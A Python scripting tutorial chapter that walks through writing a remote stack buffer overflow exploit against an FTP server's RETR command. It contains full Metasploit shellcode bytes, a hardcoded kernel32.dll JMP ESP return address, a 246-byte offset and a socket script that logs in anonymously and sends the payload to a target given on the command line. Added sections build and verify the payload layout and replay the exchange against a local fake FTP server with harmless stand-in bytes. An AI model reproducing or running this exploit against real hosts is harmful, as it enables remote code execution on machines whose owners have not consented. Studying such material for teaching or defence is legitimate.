
[Advanced Python scripting] 2.5. Writing your own 0day proof-of-concept code: the stack-based buffer overflow attack, adding the key elements of the attack, and sending the exploit code


Contents

1. Overview

2. Stack-based buffer overflow attack

2.1 Introduction

2.2 Basic terminology

3. Add the key elements of your attack

3.1 Implementation

4. Send the exploit code

4.1 Analysis

4.2 Implementation


1. Overview

Although the Metasploit framework's module library contains more than 800 different exploits, there will still be moments when you have to write a remote exploit yourself. Python simplifies that process, but first you need to understand the stack-based buffer overflow.

The Morris worm owed its success, in part, to a stack-based buffer overflow. Such vulnerabilities can be exploited successfully because thousands of programs fail to filter or validate user input before copying it into a fixed-size buffer.



2. Stack-based buffer overflow attack

2.1 Introduction

In a stack-based buffer overflow, unchecked user data overwrites the saved return address on the stack. When the function returns, that value is loaded into the instruction pointer (EIP on 32-bit x86), so the attacker controls the program's flow of execution. The exploit makes EIP point at a location inside shellcode the attacker has placed in memory. Shellcode is a sequence of machine code instructions that can, for example, add a new user to the target system, open a network connection back to the attacker, or download a standalone executable.

Shellcode size is almost unlimited; it is bounded only by the amount of available memory. There are many different ways of exploiting different types of vulnerability today, and the stack-based buffer overflow is one of the most basic.

2.2 Basic terminology

Overflow: user input longer than the maximum the stack buffer was sized for, that is, longer than the memory allocated for it.

Return address: the 4-byte address used to jump directly to the top of the stack. The exploit below uses the address of a JMP ESP instruction inside kernel32.dll (a pointer is 4 bytes long on 32-bit x86). Such an address is specific to one build of kernel32.dll and only works if the DLL is loaded at a fixed base (no ASLR); on another Windows version the same gadget sits at a different address and the exploit has to be re-pointed.

Padding: a series of NOP (no-operation) instructions placed before the shellcode. It relaxes the precision needed when predicting the address to jump to: as long as the jump lands anywhere in the NOP chain, execution slides down into the shellcode.

Shellcode: a small piece of machine code written in assembly language. In the example below we generate it with the Metasploit framework.



3. Add the key elements of your attack

3.1 Implementation

Start by writing the key elements of the exploit.

First, store in the shellcode variable the hex bytes of the payload generated by the Metasploit framework.

Next, write into the overflow variable a string of 246 letters "A" (hex value \x41). This number is the distance from the start of the vulnerable buffer to the saved return address; it depends on the target program's stack frame and must be measured per target (for example by crashing the program under a debugger).

Then point the ret variable at an address inside kernel32.dll that holds an instruction that jumps control flow directly to the top of the stack (JMP ESP). The address is packed little-endian because x86 stores pointers that way. Our padding variable is 150 NOP instructions; this forms the NOP chain.

Finally, combine all these variables into what we call the crash variable.

import struct

# Payload generated by the Metasploit framework, kept as raw bytes (the
# original listing is Python 2; bytes literals make it run under Python 3).
shellcode = (b"\xbf\x5c\x2a\x11\xb3\xd9\xe5\xd9\x74\x24\xf4\x5d\x33\xc9"
             b"\xb1\x56\x83\xc5\x04\x31\x7d\x0f\x03\x7d\x53\xc8\xe4\x4f"
             b"\x83\x85\x07\xb0\x53\xf6\x8e\x55\x62\x24\xf4\x1e\xd6\xf8"
             b"\x7e\x72\xda\x73\xd2\x67\x69\xf1\xfb\x88\xda\xbc\xdd\xa7"
             b"\xdb\x70\xe2\x64\x1f\x12\x9e\x76\x73\xf4\x9f\xb8\x86\xf5"
             b"\xd8\xa5\x68\xa7\xb1\xa2\xda\x58\xb5\xf7\xe6\x59\x19\x7c"
             b"\x56\x22\x1c\x43\x22\x98\x1f\x94\x9a\x97\x68\x0c\x91\xf0"
             b"\x48\x2d\x76\xe3\xb5\x64\xf3\xd0\x4e\x77\xd5\x28\xae\x49"
             b"\x19\xe6\x91\x65\x94\xf6\xd6\x42\x46\x8d\x2c\xb1\xfb\x96"
             b"\xf6\xcb\x27\x12\xeb\x6c\xac\x84\xcf\x8d\x61\x52\x9b\x82"
             b"\xce\x10\xc3\x86\xd1\xf5\x7f\xb2\x5a\xf8\xaf\x32\x18\xdf"
             b"\x6b\x1e\xfb\x7e\x2d\xfa\xaa\x7f\x2d\xa2\x13\xda\x25\x41"
             b"\x40\x5c\x64\x0e\xa5\x53\x97\xce\xa1\xe4\xe4\xfc\x6e\x5f"
             b"\x63\x4d\xe7\x79\x74\xb2\xd2\x3e\xea\x4d\xdc\x3e\x22\x8a"
             b"\x88\x6e\x5c\x3b\xb0\xe4\x9c\xc4\x65\xaa\xcc\x6a\xd5\x0b"
             b"\xbd\xca\x85\xe3\xd7\xc4\xfa\x14\xd8\x0e\x8d\x12\x16\x6a"
             b"\xde\xf4\x5b\x8c\xf1\x58\xd5\x6a\x9b\x70\xb3\x25\x33\xb3"
             b"\xe0\xfd\xa4\xcc\xc2\x51\x7d\x5b\x5a\xbc\xb9\x64\x5b\xea"
             b"\xea\xc9\xf3\x7d\x78\x02\xc0\x9c\x7f\x0f\x60\xd6\xb8\xd8"
             b"\xfa\x86\x0b\x78\xfa\x82\xfb\x19\x69\x49\xfb\x54\x92\xc6"
             b"\xac\x31\x64\x1f\x38\xac\xdf\x89\x5e\x2d\xb9\xf2\xda\xea"
             b"\x7a\xfc\xe3\x7f\xc6\xda\xf3\xb9\xc7\x66\xa7\x15\x9e\x30"
             b"\x11\xd0\x48\xf3\xcb\x8a\x27\x5d\x9b\x4b\x04\x5e\xdd\x53"
             b"\x41\x28\x01\xe5\x3c\x6d\x3e\xca\xa8\x79\x47\x36\x49\x85"
             b"\x92\xf2\x79\xcc\xbe\x53\x12\x89\x2b\xe6\x7f\x2a\x86\x25"
             b"\x86\xa9\x22\xd6\x7d\xb1\x47\xd3\x3a\x75\xb4\xa9\x53\x10"
             b"\xba\x1e\x53\x31")
# 246 bytes of 'A' (0x41): fills the buffer up to the saved return address
overflow = b"\x41" * 246
# Address of a JMP ESP instruction inside kernel32.dll, packed as a 4-byte
# little-endian pointer; it is popped into EIP when the function returns
ret = struct.pack('<L', 0x7C874413)  # 7C874413 JMP ESP kernel32.dll
# NOP chain: landing anywhere in it slides execution into the shellcode
padding = b"\x90" * 150
crash = overflow + ret + padding + shellcode
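Before anything goes over the wire it is worth checking what the four variables actually produce. The following is an added example, not code from the page or from Metasploit: it builds the same overflow + ret + padding + shellcode layout, shows which bytes land in the saved return address (and therefore in EIP), models what the JMP ESP gadget does with the NOP chain when ESP is a few bytes off from the prediction, and scans the payload for bytes that would cut an FTP command line short. The 8-byte shellcode is a constructed stand-in of INT3 breakpoints; the offset 246, the address 0x7C874413 and the 150-byte chain are the page's values; the bad-character set (NUL, CR, LF) is an assumption about how the target reads the RETR argument.

```python
import struct

# Bytes assumed to break a RETR argument: NUL ends a C string, CR/LF end the
# FTP command line. This set is an assumption about the target, not a fact
# from the page; real targets may choke on more bytes than these.
BAD_CHARS = b"\x00\x0a\x0d"

# Constructed stand-in for Metasploit shellcode: eight INT3 breakpoints.
SHELLCODE = b"\xcc" * 8


def build_crash(offset, ret_addr, nop_len, shellcode):
    """Same layout as the page: overflow + ret + padding + shellcode.

    offset   - bytes from the start of the vulnerable buffer to the saved EIP
    ret_addr - address of a JMP ESP gadget, packed little-endian as x86 expects
    nop_len  - length of the NOP chain (0x90 bytes) placed before the shellcode
    """
    overflow = b"\x41" * offset
    ret = struct.pack("<L", ret_addr)
    padding = b"\x90" * nop_len
    return overflow + ret + padding + shellcode


def eip_after_overflow(payload, offset):
    """The 4 bytes at `offset` are what `ret` pops into EIP on the target."""
    return struct.unpack_from("<L", payload, offset)[0]


def trace_jmp_esp(payload, offset, esp_skew=0):
    """Model execution after the JMP ESP gadget runs.

    After `ret` pops the overwritten return address, ESP points just past it
    (offset + 4), so JMP ESP starts executing payload bytes there. esp_skew
    models an ESP that sits a few bytes off from the prediction. Execution
    slides over 0x90 NOPs; the index of the first non-NOP byte executed is
    returned (None if the landing spot is outside the payload).
    """
    pc = offset + 4 + esp_skew
    if pc < 0 or pc >= len(payload):
        return None
    while pc < len(payload) and payload[pc] == 0x90:
        pc += 1
    return pc


def find_bad_chars(payload, bad=BAD_CHARS):
    """Sorted list of the bad byte values that occur anywhere in the payload."""
    return sorted({b for b in payload if b in bad})


def check_crash(offset=246, ret_addr=0x7C874413, nop_len=150, shellcode=SHELLCODE):
    """Build the payload and report the facts an operator checks before sending it."""
    crash = build_crash(offset, ret_addr, nop_len, shellcode)
    shellcode_start = offset + 4 + nop_len
    return {
        "length": len(crash),
        "eip": eip_after_overflow(crash, offset),
        "shellcode_start": shellcode_start,
        "lands_on_shellcode": trace_jmp_esp(crash, offset) == shellcode_start,
        "bad_chars": find_bad_chars(crash),
    }


if __name__ == "__main__":
    for key, value in check_crash().items():
        print(f"{key}: {value!r}")
```

The trace shows why the NOP chain matters: with the page's values execution begins at index 250 and slides to the shellcode at index 400, and it still gets there if ESP turns out to be 37 bytes further along, but a skew past the end of the chain drops execution into the middle of the shellcode. The bad-character scan is also what catches a gadget address such as 0x7C870A00, whose little-endian bytes contain NUL and LF and would never survive the RETR line intact.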


4. Send the exploit code

4.1 Analysis

Using the Berkeley socket API, create a TCP connection to port 21 on the target host. If the connection succeeds, log in anonymously. Finally, send the FTP command 'RETR' followed by the crash variable. Because the affected program does not properly check user input, this causes a stack-based buffer overflow that overwrites the saved return address (and thus EIP), making the program jump directly to the shellcode and execute it.

4.2 Implementation

import socket
import sys
import time

# The page never defines target or command; the target host is taken from the
# command line here and the FTP command is the one named in 4.1.
target = sys.argv[1]
command = "RETR"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((target, 21))
except OSError:
    print('[-] Connection to ' + target + ' failed!')
    sys.exit(0)
print('[*] Sending ' + str(len(crash)) + ' byte ' + command + ' crash...')
s.send(b"USER anonymous\r\n")   # the first recv also drains the 220 banner the server sent on connect
s.recv(1024)
s.send(b"PASS \r\n")            # anonymous login accepts an empty password
s.recv(1024)
s.send(command.encode() + b" " + crash + b"\r\n")  # crash is the bytes payload built in 3.1
time.sleep(4)                   # give the target time to run the shellcode before the socket closes
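The exchange described in 4.1, shown end to end with both sides, as an added example that is not part of the page: a minimal fake FTP service, constructed here only so the example runs offline, sends the banner and answers USER, PASS and RETR with standard FTP reply codes while recording the raw RETR argument; the client does the same anonymous login and RETR as the code above, but reads each reply line before sending the next command instead of calling recv() blindly. The payload is a constructed stand-in with the page's layout (overflow, return address, NOP chain) and INT3 bytes in place of shellcode, so nothing crashes; the point is to confirm exactly which bytes reach the server's RETR handler.

```python
import socket
import threading

# Constructed stand-in for the page's crash variable: same layout
# (overflow + ret + NOP chain + shellcode) with INT3 bytes as the shellcode.
DEMO_CRASH = b"\x41" * 246 + b"\x13\x44\x87\x7c" + b"\x90" * 150 + b"\xcc" * 8


def fake_ftp_server(listener, received):
    """Stand-in for the vulnerable FTP service (constructed for this example).

    Speaks just enough FTP for an anonymous login and one RETR, and appends the
    raw RETR argument to `received` so the caller can verify what arrived.
    """
    conn, _ = listener.accept()
    with conn:
        conn.sendall(b"220 fake ftp ready\r\n")
        buf = b""
        while True:
            chunk = conn.recv(4096)
            if not chunk:
                return
            buf += chunk
            while b"\r\n" in buf:
                line, buf = buf.split(b"\r\n", 1)
                cmd, _, arg = line.partition(b" ")
                if cmd == b"USER":
                    conn.sendall(b"331 Password required\r\n")
                elif cmd == b"PASS":
                    conn.sendall(b"230 Logged in\r\n")
                elif cmd == b"RETR":
                    received.append(arg)          # the overflow bytes as the server sees them
                    conn.sendall(b"550 Failed\r\n")
                    return
                else:
                    conn.sendall(b"500 Unknown command\r\n")


def recv_reply(sock):
    """Read one CRLF-terminated FTP reply line (b"" if the peer closed first)."""
    data = b""
    while not data.endswith(b"\r\n"):
        chunk = sock.recv(1024)
        if not chunk:
            break
        data += chunk
    return data


def send_crash(target, port, crash, timeout=5.0):
    """Anonymous login followed by RETR <crash>; returns the reply codes seen."""
    codes = []
    with socket.create_connection((target, port), timeout=timeout) as s:
        codes.append(recv_reply(s)[:3])             # 220 banner
        s.sendall(b"USER anonymous\r\n")
        codes.append(recv_reply(s)[:3])             # 331
        s.sendall(b"PASS \r\n")
        codes.append(recv_reply(s)[:3])             # 230
        s.sendall(b"RETR " + crash + b"\r\n")       # the overflow travels in the RETR argument
        try:
            codes.append(recv_reply(s)[:3])         # a target that crashed sends nothing back
        except socket.timeout:
            codes.append(b"")
    return codes


def run_demo(crash=DEMO_CRASH):
    """Run client and fake server on loopback; returns (reply codes, RETR args received)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))               # ephemeral port, loopback only
    listener.listen(1)
    received = []
    server = threading.Thread(target=fake_ftp_server, args=(listener, received), daemon=True)
    server.start()
    codes = send_crash("127.0.0.1", listener.getsockname()[1], crash)
    server.join(5)
    listener.close()
    return codes, received


if __name__ == "__main__":
    codes, received = run_demo()
    print("replies:", codes)
    print("RETR argument length:", len(received[0]) if received else None)
```

Against a real target the last reply is usually absent, because the process has already crashed or is running the shellcode; reading replies rather than sleeping is what lets the client tell a normal 550 from a service that went silent.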

